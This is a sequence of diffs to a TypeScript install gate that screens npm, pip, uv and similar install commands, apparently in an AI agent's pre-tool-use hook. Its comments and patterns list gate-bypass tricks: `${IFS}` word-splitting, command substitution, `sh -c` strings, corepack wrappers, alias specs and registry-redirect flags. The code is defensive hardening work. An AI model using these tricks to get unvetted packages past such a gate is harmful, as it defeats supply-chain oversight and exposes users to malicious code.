         (bin === "pnpm" || bin === "yarn" || bin === "bun") &&
@@ -487,6 +494,11 @@ export function parseInstallCommand(command: string): InstallProbe {
  * `-p/--package` detection read the FULL tokens/raw, so dropping flags here loses nothing.)
  */
 function compactPositionals(tokens: string[]): string[] {
+  // `-r`/`-c`/`-e` requirement flags are PIP concepts whose value is a file, not a package.
+  // Skipping their value only makes sense for a pip-family command — on an npm/yarn install
+  // those aren't valueless flags, so eating the next token would drop a real package
+  // (`npm i -e evil` must still gate `evil`). Source/package-value flags exist in both.
+  const pipFamily = /^(pip|pip3|pipx|uv|uvx|poetry|pdm|python|python3)$/.test(tokens[0] ?? "");
   const pos: string[] = [];
   for (let i = 0; i < tokens.length; i++) {
     const tok = tokens[i];
@@ -500,7 +512,11 @@ function compactPositionals(tokens: string[]): string[] {
       if (glued) pos.push(glued[1]);
       continue;
     }
-    if (SOURCE_FLAG_RE.test(tok) || REQUIREMENT_FLAG_RE.test(tok) || VALUE_PKG_FLAG_RE.test(tok)) {
+    if (
+      SOURCE_FLAG_RE.test(tok) ||
+      VALUE_PKG_FLAG_RE.test(tok) ||
+      (pipFamily && REQUIREMENT_FLAG_RE.test(tok))
+    ) {
       i++; // skip the flag AND its value token
       continue;
     }

--- a/src/install-gate.ts
+++ b/src/install-gate.ts
@@ -158,6 +158,11 @@ const PREFIX_BINS = new Set([
   "doas",
   "setsid",
   "stdbuf",
+  // corepack ships with Node and dispatches to the pinned package manager, so
+  // `corepack pnpm add evil` really runs `pnpm add evil`. It's a pure wrapper; stripping
+  // it exposes the real manager. Its own subcommands (enable/install/use) reduce to a
+  // bare verb no matcher claims, so no false positive.
+  "corepack",
 ]);
 
 /** Drop leading wrapper bins + `VAR=value` env assignments, returning the real argv. */
@@ -252,10 +257,12 @@ function nestedCommands(command: string): string[] {
  * `npm${IFS}i${IFS}evil` runs `npm i evil` — but a literal-`\s+` tokenizer keeps it one
  * token and every matcher misses it (the canonical word-split gate bypass). Collapsing them
  * first makes the real argv visible. `$IFS` is matched only as a whole var (not `$IFSx`).
+ * The braced form allows any parameter-expansion operator (`${IFS:0:1}`, `${IFS%%x}`) — all
+ * still expand to whitespace and word-split — while `$IFSx` stays a different variable.
  */
 function normalizeShellWhitespace(command: string): string {
   return command
-    .replace(/(["']?)\$\{IFS\}\1/g, " ")
+    .replace(/(["']?)\$\{IFS[^}]*\}\1/g, " ")
     .replace(/(["']?)\$IFS\1(?=[^A-Za-z0-9_]|$)/g, " ")
     .replace(/\$'(?:\\[tnr]| )'/g, " ");
 }

--- a/src/install-gate.ts
+++ b/src/install-gate.ts
@@ -526,11 +526,25 @@ export function parseInstallCommand(command: string): InstallProbe {
   // so a wrapper (`sh -c '…'`, `$(…)`) can't smuggle an install past the splitter.
   const seen = new Set<string>();
   const queue: string[] = [command];
-  while (queue.length > 0 && seen.size < 64) {
-    const cmd = normalizeShellWhitespace(queue.shift()!);
+  // Dequeue with a head cursor, NOT queue.shift(): shift() is O(N) on a large array, and the
+  // `seen` cap doesn't bound the array — a command with many identical nested items (e.g.
+  // `$(npm i evil)` repeated) enqueues N duplicates that are shifted-and-skipped, giving O(N²)
+  // on the PreToolUse hot path. A cursor makes each dequeue O(1); only-push-unseen keeps the
+  // array near-linear in the input.
+  const queued = new Set<string>(queue);
+  let head = 0;
+  while (head < queue.length && seen.size < 64) {
+    const cmd = normalizeShellWhitespace(queue[head++]);
     if (seen.has(cmd)) continue;
     seen.add(cmd);
-    queue.push(...nestedCommands(cmd));
+    // Enqueue each distinct nested command once — a command with N identical nested items
+    // (`$(npm i evil)` repeated) must not push N duplicates that keep the array growing.
+    for (const nested of nestedCommands(cmd)) {
+      if (!queued.has(nested)) {
+        queued.add(nested);
+        queue.push(nested);
+      }
+    }
     for (const segment of cmd.split(SEGMENT_SPLIT)) scanSegment(segment, probe);
   }
 

--- a/src/install-gate.ts
+++ b/src/install-gate.ts
@@ -580,7 +580,17 @@ function hasExecCallFlag(tokens: string[]): boolean {
   const isExecRunner =
     /^(npm|pnpm|yarn|bun)$/.test(tokens[0] ?? "") && /^(exec|dlx|x)$/.test(tokens[1] ?? "");
   if (!isExecRunner) return false;
-  return tokens.some((t) => t === "-c" || t === "--call" || /^(-c|--call)=/.test(t));
+  // The runner parses `-c`/`--call` only BEFORE the first positional (the command). After
+  // the command appears, a `-c` belongs to THAT tool (`npm exec jest -c jest.config.js` —
+  // `-c` is jest's; `jest` is a real fetched package that must still be gated), so stop.
+  for (let i = 2; i < tokens.length; i++) {
+    const t = tokens[i];
+    if (t === "-c" || t === "--call" || /^(-c|--call)=/.test(t)) return true;
+    if (t === "--") return false; // everything after `--` is the command + its own args
+    if (!t.startsWith("-")) return false; // first positional (the command) reached
+    if (/^(-p|--package|--with|--spec|--from)$/.test(t)) i++; // skip a value-consuming flag
+  }
+  return false;
 }
 
 /**

--- a/src/install-gate.ts
+++ b/src/install-gate.ts
@@ -71,6 +71,28 @@ function isFlag(tok: string): boolean {
 }
 
 /**
+ * Package(s) named by a runner's `-p`/`--package` flag (`npx --package=evil cmd`,
+ * `npm exec -p evil -- cmd`). For a runner these are the FETCHED packages, while the
+ * positional is the command to run — so `--package=evil somecmd` must gate `evil`, not
+ * `somecmd`. Returns the flag values found (equals- and space-separated forms).
+ */
+function packageFlagTargets(rest: string[]): string[] {
+  const out: string[] = [];
+  for (let i = 0; i < rest.length; i++) {
+    const eq = rest[i].match(/^(?:-p|--package|--spec|--from)=(.+)$/);
+    if (eq) {
+      out.push(eq[1]);
+      continue;
+    }
+    if (/^(?:-p|--package|--spec|--from)$/.test(rest[i])) {
+      if (rest[i + 1] !== undefined && !rest[i + 1].startsWith("-")) out.push(rest[i + 1]);
+      i++;
+    }
+  }
+  return out;
+}
+
+/**
  * Remove quote characters from a token, matching how the shell strips quotes WITHIN a
  * word — `n"p"m` → `npm`, `i'nstall'` → `install`, `'pkg'` → `pkg`. The old version only
  * unwrapped quotes around a WHOLE token, so intra-word quoting (`n"p"m install evil`) hid
@@ -190,7 +212,8 @@ function nestedCommands(command: string): string[] {
 // (fail-closed), closing the "triage PASS while pulling attacker code" bypass.
 const SOURCE_ENV_RE =
   /^(npm_config_.*registry|npm_config_userconfig|npm_config_globalconfig|.*_registry|yarn_npm_registry_server|pip_index_url|pip_extra_index_url|pip_config_file|uv_index.*|uv_default_index|bun_config_registry)$/i;
-const SOURCE_FLAG_RE = /^(--registry|--index-url|--index|--extra-index-url|--default-index|-i)$/i;
+const SOURCE_FLAG_RE =
+  /^(--registry|--index-url|--index|--extra-index-url|--default-index|--userconfig|--globalconfig|-i)$/i;
 // pip flags whose VALUE is a FILE/path, not a registry package — skip the value so
 // `pip install -r requirements.txt` isn't mis-triaged as a package `requirements.txt`
 // (a false positive that blocks a benign install and pushes users off the gate).
@@ -221,7 +244,7 @@ function sourceRedirect(rawTokens: string[]): string | null {
       continue;
     }
     const flagEq = t.match(
-      /^(--registry|--index-url|--index|--extra-index-url|--default-index)=(.*)$/i,
+      /^(--registry|--index-url|--index|--extra-index-url|--default-index|--userconfig|--globalconfig)=(.*)$/i,
     );
     if (flagEq) {
       if (!DEFAULT_SOURCE_RE.test(flagEq[2])) return t;
@@ -331,15 +354,21 @@ const MATCHERS: Matcher[] = [
     scheme: "pip",
     toName: pipName,
     argStart: (t) => {
-      if ((t[0] === "pip" || t[0] === "pip3" || t[0] === "pipx") && t[1] === "install") return 2;
+      // pip install|wheel|download — wheel/download still fetch from PyPI and run the
+      // sdist's setup.py (arbitrary code), so they must be gated like install.
+      if ((t[0] === "pip" || t[0] === "pip3") && /^(install|wheel|download)$/.test(t[1] ?? ""))
+        return 2;
+      if (t[0] === "pipx" && t[1] === "install") return 2;
       if (t[0] === "uv" && t[1] === "pip" && t[2] === "install") return 3;
       if (t[0] === "uv" && t[1] === "add") return 2;
       if (t[0] === "uv" && t[1] === "tool" && t[2] === "install") return 3;
+      // Other PyPI-backed installers.
+      if ((t[0] === "poetry" || t[0] === "pdm") && t[1] === "add") return 2;
       if (
         (t[0] === "python" || t[0] === "python3") &&
         t[1] === "-m" &&
         t[2] === "pip" &&
-        t[3] === "install"
+        /^(install|wheel|download)$/.test(t[3] ?? "")
       )
         return 4;
       return -1;
@@ -387,6 +416,34 @@ export function parseInstallCommand(command: string): InstallProbe {
   return probe;
 }
 
+/**
+ * Flag-compacted positionals for verb + arg detection. Option flags are dropped so a
+ * manager flag BEFORE the subcommand (`npm -g install evil`, `pip -q install evil`,
+ * `npm --registry=X install express`) can't shift the verb past the fixed-index matchers
+ * — the CRITICAL bypass. Kept: the structural `-m` in `python -m pip`. Skipped together:
+ * the VALUE of a source/requirement flag (`--registry URL`, `-r reqs.txt`) so it isn't
+ * mistaken for a package. Stops at an inline `#` comment. (Source-redirect and
+ * `-p/--package` detection read the FULL tokens/raw, so dropping flags here loses nothing.)
+ */
+function compactPositionals(tokens: string[]): string[] {
+  const pos: string[] = [];
+  for (let i = 0; i < tokens.length; i++) {
+    const tok = tokens[i];
+    if (tok.startsWith("#")) break;
+    if (tok === "-m" && pos.length === 1 && /^python3?$/.test(pos[0])) {
+      pos.push(tok); // structural: python -m pip
+      continue;
+    }
+    if (SOURCE_FLAG_RE.test(tok) || REQUIREMENT_FLAG_RE.test(tok)) {
+      i++; // skip the flag AND its value token
+      continue;
+    }
+    if (isFlag(tok)) continue; // drop option flag (can't shift the subcommand)
+    pos.push(tok);
+  }
+  return pos;
+}
+
 /** Match one shell segment against the package-manager matchers, mutating `probe`. */
 function scanSegment(segment: string, probe: InstallProbe): void {
   const raw = stripInlineComment(segment)
@@ -400,35 +457,34 @@ function scanSegment(segment: string, probe: InstallProbe): void {
   tokens[0] = binBase(tokens[0]); // /usr/bin/npm, \npm, ./bin/pnpm → npm/pnpm
 
   // Fail-closed on an install run through an unresolvable indirection: `$PM install evil`,
-  // `${X} add evil`. argv0 is a shell variable the static parser can't expand, and the
-  // next token is an install/runner verb — we can't verify what actually runs → block.
+  // `${X} add evil`, `$(which npm) i evil`, `` `which npm` i evil ``. argv0 isn't a
+  // statically-known binary (a bare variable, or a command substitution), and some token
+  // is an install/runner verb — we can't verify what actually runs → block. A var-prefixed
+  // PATH like `$HOME/bin/tool` is NOT treated as dynamic (it has a real path), so no FP.
+  const dynamicBin =
+    /^\$\{?\w+\}?$/.test(tokens[0]) || tokens[0].startsWith("$(") || tokens[0].startsWith("`");
   if (
-    /^\$\{?\w+\}?$/.test(tokens[0]) &&
-    /^(install|i|add|create|init|exec|dlx|x|run)$/.test(tokens[1] ?? "")
+    dynamicBin &&
+    tokens
+      .slice(1)
+      .some((t) => /^(install|i|add|create|init|exec|dlx|x|run|wheel|download)$/.test(binBase(t)))
   ) {
     probe.isInstall = true;
     probe.unverifiable.push(`indirect-bin:${tokens[0]}`);
     return;
   }
 
+  const pos = compactPositionals(tokens);
+  if (pos.length === 0) return;
+
   for (const m of MATCHERS) {
-    const start = m.argStart(tokens);
+    const start = m.argStart(pos);
     if (start < 0) continue;
-    // Build the package args, skipping flags AND the VALUE token of a source flag
-    // (`-i URL`, `--registry URL`) or a requirement/editable file flag (`-r reqs.txt`),
-    // and stopping at an inline `#` comment token.
-    const rest = tokens.slice(start);
-    const args: string[] = [];
-    for (let i = 0; i < rest.length; i++) {
-      const tok = rest[i];
-      if (tok.startsWith("#")) break; // inline comment
-      if (SOURCE_FLAG_RE.test(tok) || REQUIREMENT_FLAG_RE.test(tok)) {
-        i++; // skip the flag AND its value token
-        continue;
-      }
-      if (!isFlag(tok)) args.push(tok);
-    }
-    if (args.length === 0) {
+    const args = pos.slice(start); // positionals after the verb (flags already removed)
+    // For a runner, the fetched package can be named by `-p`/`--package`/`--spec`/`--from`
+    // (`npx --package=evil cmd`); then the POSITIONAL is the command to run, not a package.
+    const pkgFlags = m.single ? packageFlagTargets(tokens) : [];
+    if (args.length === 0 && pkgFlags.length === 0) {
       // `echo evil | xargs npm i` feeds the package on stdin, leaving zero visible args
       // while still installing. If this segment is an xargs target, fail-closed rather
       // than treating it as a benign bare reinstall.
@@ -443,9 +499,10 @@ function scanSegment(segment: string, probe: InstallProbe): void {
     // fail-closed (mark unverifiable) even if every name is reputable.
     const redirect = sourceRedirect(raw);
     if (redirect) probe.unverifiable.push(`alt-registry:${redirect}`);
-    // A RUNNER (npx/create/exec/uvx…) fetches only its FIRST arg; the rest are that
-    // tool's arguments. An INSTALLER treats every arg as a package.
-    const targets = m.single ? args.slice(0, 1) : args;
+    // A RUNNER fetches its `-p`/`--package` package(s) if present, else only its FIRST
+    // positional; the rest are that tool's arguments. An INSTALLER treats every positional
+    // as a package.
+    const targets = m.single ? (pkgFlags.length ? pkgFlags : args.slice(0, 1)) : args;
     for (const arg of targets) {
       if (isLocalTarget(arg)) continue; // user's own code — nothing to triage
       const name = m.toName(arg);

--- a/src/install-gate.ts
+++ b/src/install-gate.ts
@@ -260,8 +260,10 @@ function nestedCommands(command: string): string[] {
   // manager's install for real, but the runner path would gate only the manager name (npm:npm,
   // reputable → PASS) and miss the real package. Recurse from the inner manager so its args are
   // scanned as a command. Contrived but a genuine bypass; fail-closed.
+  // `(?:(?:--|-\S+|\S+=\S+)\s+)*` tolerates flags between the runner and the inner manager
+  // (`npx -y npm i evil`, `npm exec -- npm i evil`) — the inner pm need not be adjacent.
   for (const m of command.matchAll(
-    /(?:npx|bunx|(?:npm|pnpm|yarn|bun)(?:@\S+)?\s+(?:exec|dlx|x))\s+((?:npm|pnpm|yarn|bun|pip|pip3|pipx|uv|uvx|python|python3|poetry|pdm)(?:@\S+)?\s[^\n]{1,2000})/g,
+    /(?:npx|bunx|(?:npm|pnpm|yarn|bun)(?:@\S+)?\s+(?:exec|dlx|x))\s+(?:(?:--|-\S+|\S+=\S+)\s+)*((?:npm|pnpm|yarn|bun|pip|pip3|pipx|uv|uvx|python|python3|poetry|pdm)(?:@\S+)?\s[^\n]{1,2000})/g,
   )) {
     out.push(m[1]);
   }

--- a/src/install-gate.ts
+++ b/src/install-gate.ts
@@ -234,7 +234,30 @@ function nestedCommands(command: string): string[] {
   // shell (`bash <<< "npm i evil"`); recurse into it.
   for (const m of command.matchAll(/<<<\s*(['"])([\s\S]{1,2000}?)\1/g)) out.push(m[2]);
   for (const m of command.matchAll(/<<<\s*([^\s'"][^\n]{0,2000})/g)) out.push(m[1]);
+  // `npm|pnpm|yarn|bun exec|dlx|x  -c/--call '<shell string>'` runs the string in a shell
+  // (with node_modules/.bin on PATH), so an install inside it really executes — recurse.
+  // The runner path itself gates nothing positional here (hasExecCallFlag), so the package
+  // is only seen via this recursion.
+  for (const m of command.matchAll(
+    /(?:npm|pnpm|yarn|bun)\s+(?:exec|dlx|x)\b[^\n]*?\s(?:--call|-c)(?:=|\s)\s*(['"])([\s\S]{1,2000}?)\1/g,
+  )) {
+    out.push(m[2]);
+  }
   return out;
+}
+
+/**
+ * Normalize runtime whitespace expansions to a real space BEFORE tokenizing. In any POSIX
+ * shell `${IFS}`/`$IFS` (and ANSI-C `$'\t'`/`$'\n'`) expand to whitespace, so
+ * `npm${IFS}i${IFS}evil` runs `npm i evil` — but a literal-`\s+` tokenizer keeps it one
+ * token and every matcher misses it (the canonical word-split gate bypass). Collapsing them
+ * first makes the real argv visible. `$IFS` is matched only as a whole var (not `$IFSx`).
+ */
+function normalizeShellWhitespace(command: string): string {
+  return command
+    .replace(/(["']?)\$\{IFS\}\1/g, " ")
+    .replace(/(["']?)\$IFS\1(?=[^A-Za-z0-9_]|$)/g, " ")
+    .replace(/\$'(?:\\[tnr]| )'/g, " ");
 }
 
 // Env vars / flags that REDIRECT where a package manager fetches from. If any is
@@ -471,7 +494,7 @@ export function parseInstallCommand(command: string): InstallProbe {
   const seen = new Set<string>();
   const queue: string[] = [command];
   while (queue.length > 0 && seen.size < 64) {
-    const cmd = queue.shift()!;
+    const cmd = normalizeShellWhitespace(queue.shift()!);
     if (seen.has(cmd)) continue;
     seen.add(cmd);
     queue.push(...nestedCommands(cmd));
@@ -548,8 +571,22 @@ function indirectInstall(tokens: string[], probe: InstallProbe): boolean {
 }
 
 /**
+ * `npm|pnpm|yarn|bun exec|dlx|x  -c/--call '<str>'` runs `<str>` in a shell, so the
+ * positional is NOT a fetched package (`npm exec -c "npm i evil"` would otherwise mis-gate
+ * `npm` and miss `evil`). The string itself is recursed by `nestedCommands`; here we just
+ * suppress the positional-as-package for the runner.
+ */
+function hasExecCallFlag(tokens: string[]): boolean {
+  const isExecRunner =
+    /^(npm|pnpm|yarn|bun)$/.test(tokens[0] ?? "") && /^(exec|dlx|x)$/.test(tokens[1] ?? "");
+  if (!isExecRunner) return false;
+  return tokens.some((t) => t === "-c" || t === "--call" || /^(-c|--call)=/.test(t));
+}
+
+/**
  * The packages a matched invocation actually FETCHES.
- *  - pkgFlagOnly (uv run): the positional is a LOCAL script — only `--with` fetches.
+ *  - pkgFlagOnly (uv run) / exec -c call: the positional is a LOCAL script or shell string —
+ *    only `--with`/`--package` flags fetch; the string is recursed elsewhere.
  *  - other runners: primary = replace-flags (`-p`/`--package`/`--spec`/`--from`) if present
  *    else the first positional, PLUS every `--with` (an extra fetched package).
  *  - installer: every positional is a package.
@@ -557,8 +594,8 @@ function indirectInstall(tokens: string[], probe: InstallProbe): boolean {
 function resolveTargets(m: Matcher, args: string[], tokens: string[]): string[] {
   if (!m.single) return args;
   const withFlags = withPackageFlags(tokens);
-  if (m.pkgFlagOnly) return withFlags;
   const replaceFlags = replacePackageFlags(tokens);
+  if (m.pkgFlagOnly || hasExecCallFlag(tokens)) return [...replaceFlags, ...withFlags];
   return [...(replaceFlags.length ? replaceFlags : args.slice(0, 1)), ...withFlags];
 }
 

--- a/src/install-gate.ts
+++ b/src/install-gate.ts
@@ -260,10 +260,13 @@ function nestedCommands(command: string): string[] {
   // manager's install for real, but the runner path would gate only the manager name (npm:npm,
   // reputable → PASS) and miss the real package. Recurse from the inner manager so its args are
   // scanned as a command. Contrived but a genuine bypass; fail-closed.
-  // `(?:(?:--|-\S+|\S+=\S+)\s+)*` tolerates flags between the runner and the inner manager
-  // (`npx -y npm i evil`, `npm exec -- npm i evil`) — the inner pm need not be adjacent.
+  // Tolerate flags between the runner and the inner manager (`npx -y npm i evil`,
+  // `npm exec -- npm i evil`). The two flag alternatives MUST be mutually exclusive — a
+  // dash-led token (`-\S*`, covering `--`/`-x`/`-x=y`) vs a non-dash `key=value` env
+  // assignment (`[^-\s]\S*=\S+`) — so a `-x=y` token can't match both and blow the group up
+  // into 2^N parse paths (a catastrophic-backtracking ReDoS on this PreToolUse hot path).
   for (const m of command.matchAll(
-    /(?:npx|bunx|(?:npm|pnpm|yarn|bun)(?:@\S+)?\s+(?:exec|dlx|x))\s+(?:(?:--|-\S+|\S+=\S+)\s+)*((?:npm|pnpm|yarn|bun|pip|pip3|pipx|uv|uvx|python|python3|poetry|pdm)(?:@\S+)?\s[^\n]{1,2000})/g,
+    /(?:npx|bunx|(?:npm|pnpm|yarn|bun)(?:@\S+)?\s+(?:exec|dlx|x))\s+(?:(?:-\S*|[^-\s]\S*=\S+)\s+)*((?:npm|pnpm|yarn|bun|pip|pip3|pipx|uv|uvx|python|python3|poetry|pdm)(?:@\S+)?\s[^\n]{1,2000})/g,
   )) {
     out.push(m[1]);
   }

--- a/src/install-gate.ts
+++ b/src/install-gate.ts
@@ -396,8 +396,10 @@ function isLocalTarget(tok: string): boolean {
 
 /** A clean npm package name (optionally scoped, optionally @version) → bare name. */
 function npmName(tok: string): string | null {
-  // @scope/name(@version)?  or  name(@version)?
-  const m = tok.match(/^(@[a-z0-9][\w.-]*\/[a-z0-9][\w.-]*|[a-z0-9][\w.-]*)(@[^/\s]+)?$/i);
+  // @scope/name(@version)?  or  name(@version)?  The version excludes `:` so an ALIAS spec
+  // (`foo@npm:realpkg`, `foo@git+ssh://…`) fails to validate → routed to `unverifiable`
+  // rather than triaging the innocent alias NAME while the aliased target actually installs.
+  const m = tok.match(/^(@[a-z0-9][\w.-]*\/[a-z0-9][\w.-]*|[a-z0-9][\w.-]*)(@[^/\s:]+)?$/i);
   return m ? m[1] : null;
 }
 
@@ -415,7 +417,7 @@ function pipName(tok: string): string | null {
  * "" when no version is pinned. npm form → `@1.2.3`/`@next`; pip form → `==1.2.3`/`>=2`.
  */
 function npmVersion(tok: string): string {
-  const m = tok.match(/^(?:@[a-z0-9][\w.-]*\/[a-z0-9][\w.-]*|[a-z0-9][\w.-]*)(@[^/\s]+)$/i);
+  const m = tok.match(/^(?:@[a-z0-9][\w.-]*\/[a-z0-9][\w.-]*|[a-z0-9][\w.-]*)(@[^/\s:]+)$/i);
   return m ? m[1] : "";
 }
 function pipVersion(tok: string): string {

--- a/src/install-gate.ts
+++ b/src/install-gate.ts
@@ -408,6 +408,21 @@ function pipName(tok: string): string | null {
   return m ? m[1] : null;
 }
 
+/**
+ * The version/dist-tag suffix of an install target, carried onto the triage ref so the gate
+ * triages the SPECIFIC version being installed — not `latest`. A clean `latest` can hide a
+ * yanked/malicious pinned version (`npm i evil@1.2.3` was triaged as `evil@latest`). Returns
+ * "" when no version is pinned. npm form → `@1.2.3`/`@next`; pip form → `==1.2.3`/`>=2`.
+ */
+function npmVersion(tok: string): string {
+  const m = tok.match(/^(?:@[a-z0-9][\w.-]*\/[a-z0-9][\w.-]*|[a-z0-9][\w.-]*)(@[^/\s]+)$/i);
+  return m ? m[1] : "";
+}
+function pipVersion(tok: string): string {
+  const m = tok.match(/^[a-z0-9][\w.-]*(?:\[[\w,.-]*\])?\s*([<>=!~][^\s]*)$/i);
+  return m ? m[1] : "";
+}
+
 interface Matcher {
   /** Does this segment's leading tokens start an in-scope install? Returns the index of the first ARG token, or -1. */
   argStart(tokens: string[]): number;
@@ -725,8 +740,11 @@ function applyMatcher(
   for (const arg of targets) {
     if (isLocalTarget(arg)) continue; // user's own code — nothing to triage
     const name = m.toName(arg);
-    if (name) probe.refs.push(`${m.scheme}:${name}`);
-    else probe.unverifiable.push(arg); // fail-closed: can't reduce to a ref
+    if (name) {
+      // Carry the pinned version/tag onto the ref so triage checks THAT version, not latest.
+      const ver = m.scheme === "npm" ? npmVersion(arg) : pipVersion(arg);
+      probe.refs.push(`${m.scheme}:${name}${ver}`);
+    } else probe.unverifiable.push(arg); // fail-closed: can't reduce to a ref
   }
   return true;
 }

--- a/src/install-gate.ts
+++ b/src/install-gate.ts
@@ -71,12 +71,12 @@ function isFlag(tok: string): boolean {
 }
 
 /**
- * Package(s) named by a runner's `-p`/`--package` flag (`npx --package=evil cmd`,
- * `npm exec -p evil -- cmd`). For a runner these are the FETCHED packages, while the
- * positional is the command to run — so `--package=evil somecmd` must gate `evil`, not
- * `somecmd`. Returns the flag values found (equals- and space-separated forms).
+ * Package(s) that REPLACE a runner's positional-as-package: `-p`/`--package` (npx),
+ * `--spec` (pipx), `--from` (uvx). For these the flag value is the FETCHED package and
+ * the positional is the command to run — so `--package=evil somecmd` must gate `evil`,
+ * not `somecmd`. Returns the values found (equals- and space-separated forms).
  */
-function packageFlagTargets(rest: string[]): string[] {
+function replacePackageFlags(rest: string[]): string[] {
   const out: string[] = [];
   for (let i = 0; i < rest.length; i++) {
     const eq = rest[i].match(/^(?:-p|--package|--spec|--from)=(.+)$/);
@@ -85,6 +85,27 @@ function packageFlagTargets(rest: string[]): string[] {
       continue;
     }
     if (/^(?:-p|--package|--spec|--from)$/.test(rest[i])) {
+      if (rest[i + 1] !== undefined && !rest[i + 1].startsWith("-")) out.push(rest[i + 1]);
+      i++;
+    }
+  }
+  return out;
+}
+
+/**
+ * ADDITIONAL packages a runner fetches via `--with` (`uv run --with evil script`,
+ * `uvx --with evil tool`): these install alongside the primary package/positional, so
+ * they are ALWAYS gated and never replace it. Returns the values found.
+ */
+function withPackageFlags(rest: string[]): string[] {
+  const out: string[] = [];
+  for (let i = 0; i < rest.length; i++) {
+    const eq = rest[i].match(/^--with=(.+)$/);
+    if (eq) {
+      out.push(eq[1]);
+      continue;
+    }
+    if (rest[i] === "--with") {
       if (rest[i + 1] !== undefined && !rest[i + 1].startsWith("-")) out.push(rest[i + 1]);
       i++;
     }
@@ -190,7 +211,15 @@ function nestedCommands(command: string): string[] {
   const out: string[] = [];
   for (const m of command.matchAll(/\$\(([^()]{1,2000})\)/g)) out.push(m[1]);
   for (const m of command.matchAll(/`([^`]{1,2000})`/g)) out.push(m[1]);
-  for (const m of command.matchAll(/-c\s+(['"])([\s\S]{1,2000}?)\1/g)) out.push(m[2]);
+  // `sh -c '…'` / `bash -euo pipefail -c "…"` — the quoted arg to a SHELL's `-c` is executed,
+  // so recurse into it. Anchored to a shell binary (optionally path-qualified, with flags
+  // between) rather than any `-c` anywhere: a bare `-c` in an unrelated command's quoted
+  // argument (`git commit -m "…-c…"`) isn't a shell invocation and must not be gated.
+  for (const m of command.matchAll(
+    /(?:^|\s)(?:\S*\/)?(?:sh|bash|zsh|dash|ksh|ash|fish)(?:\s+\S+)*?\s+-c\s+(['"])([\s\S]{1,2000}?)\1/g,
+  )) {
+    out.push(m[2]);
+  }
   // `eval '…'` / `xargs "…"` — the QUOTED script arg (the unquoted form is handled
   // by SHELL_KEYWORDS stripping). Recurse so a quoted install can't hide behind eval.
   for (const m of command.matchAll(/\b(?:eval|xargs)\s+(['"])([\s\S]{1,2000}?)\1/g)) {
@@ -218,6 +247,12 @@ const SOURCE_FLAG_RE =
 // `pip install -r requirements.txt` isn't mis-triaged as a package `requirements.txt`
 // (a false positive that blocks a benign install and pushes users off the gate).
 const REQUIREMENT_FLAG_RE = /^(-r|--requirement|-e|--editable|-c|--constraint)$/i;
+// Flags whose VALUE is a package name we extract separately (replace/withPackageFlags).
+// Skipped WITH their value in the compacted positional view so the value can't leak in
+// as a positional and steal the runner's primary slot (`uvx --with evil sometool` must
+// keep `sometool` as the first positional). Long forms only; `-p`/glued `=` are handled
+// elsewhere (short -p is ambiguous across installers; `--x=v` is one token, auto-dropped).
+const VALUE_PKG_FLAG_RE = /^(--package|--spec|--from|--with)$/i;
 
 /** Cut an unquoted trailing `# comment` (one starting a word) before tokenizing, so a
  *  comment's words aren't triaged as packages / mistaken for a registry redirect. A `#`
@@ -292,6 +327,11 @@ interface Matcher {
   /** A RUNNER (npx/create/exec/uvx…): only the FIRST non-flag arg is the fetched
    *  package; the rest are arguments passed to it. Installers gate every arg. */
   single?: boolean;
+  /** Gate ONLY the `--package`/`--with`/… flag packages, never a positional — for
+   *  commands whose positional is a local script/command, not a fetched package
+   *  (`uv run --with evil script.py`: gate `evil`, not `script.py`). Not an install
+   *  unless such a flag is present. */
+  pkgFlagOnly?: boolean;
 }
 
 /** `npm init foo` / `npm|yarn|pnpm|bun create foo` fetches the `create-foo` initiator
@@ -306,6 +346,31 @@ function initiatorName(tok: string): string | null {
   return `create-${n}`;
 }
 
+const PIP_INSTALL_VERB_RE = /^(install|wheel|download)$/;
+
+/** `uv add|pip install|tool install` → first ARG index, else -1. */
+function uvInstallerArgStart(b: string | undefined, c: string | undefined): number {
+  if (b === "add") return 2;
+  if (b === "pip" && c === "install") return 3;
+  if (b === "tool" && c === "install") return 3;
+  return -1;
+}
+
+/** pip/pip3 install|wheel|download, pipx install, uv pip install, uv add, uv tool install,
+ *  poetry/pdm add, python -m pip install|wheel|download. Returns the first ARG index or -1.
+ *  Extracted from the matcher literal to keep its cyclomatic complexity in bounds.
+ *  (wheel/download still fetch from PyPI and run the sdist's setup.py — arbitrary code.) */
+function pipInstallerArgStart(t: string[]): number {
+  const [a, b, c] = t;
+  if (a === "pip" || a === "pip3") return PIP_INSTALL_VERB_RE.test(b ?? "") ? 2 : -1;
+  if (a === "pipx") return b === "install" ? 2 : -1;
+  if (a === "poetry" || a === "pdm") return b === "add" ? 2 : -1;
+  if (a === "uv") return uvInstallerArgStart(b, c);
+  if (a === "python" || a === "python3")
+    return b === "-m" && c === "pip" && PIP_INSTALL_VERB_RE.test(t[3] ?? "") ? 4 : -1;
+  return -1;
+}
+
 /** Recognized package-manager invocations, by leading-token shape. */
 const MATCHERS: Matcher[] = [
   // npm install|i|add <pkg...>, pnpm add|install, yarn add, bun add  (INSTALLER: all args)
@@ -314,12 +379,17 @@ const MATCHERS: Matcher[] = [
     toName: npmName,
     argStart: (t) => {
       const bin = t[0];
-      if (bin === "npm" && /^(install|i|add)$/.test(t[1] ?? "")) return 2;
+      // install-test|it also install the named package (then run tests); update|upgrade
+      // re-fetch untriaged tarballs at attacker-chosen versions — all gated like install.
+      if (bin === "npm" && /^(install|i|add|install-test|it|update|upgrade)$/.test(t[1] ?? ""))
+        return 2;
       if (
         (bin === "pnpm" || bin === "yarn" || bin === "bun") &&
-        /^(add|install|i)$/.test(t[1] ?? "")
+        /^(add|install|i|update|upgrade)$/.test(t[1] ?? "")
       )
         return 2;
+      // yarn 1 global add / yarn global install
+      if (bin === "yarn" && t[1] === "global" && /^(add|install)$/.test(t[2] ?? "")) return 3;
       return -1;
     },
   },
@@ -353,26 +423,7 @@ const MATCHERS: Matcher[] = [
   {
     scheme: "pip",
     toName: pipName,
-    argStart: (t) => {
-      // pip install|wheel|download — wheel/download still fetch from PyPI and run the
-      // sdist's setup.py (arbitrary code), so they must be gated like install.
-      if ((t[0] === "pip" || t[0] === "pip3") && /^(install|wheel|download)$/.test(t[1] ?? ""))
-        return 2;
-      if (t[0] === "pipx" && t[1] === "install") return 2;
-      if (t[0] === "uv" && t[1] === "pip" && t[2] === "install") return 3;
-      if (t[0] === "uv" && t[1] === "add") return 2;
-      if (t[0] === "uv" && t[1] === "tool" && t[2] === "install") return 3;
-      // Other PyPI-backed installers.
-      if ((t[0] === "poetry" || t[0] === "pdm") && t[1] === "add") return 2;
-      if (
-        (t[0] === "python" || t[0] === "python3") &&
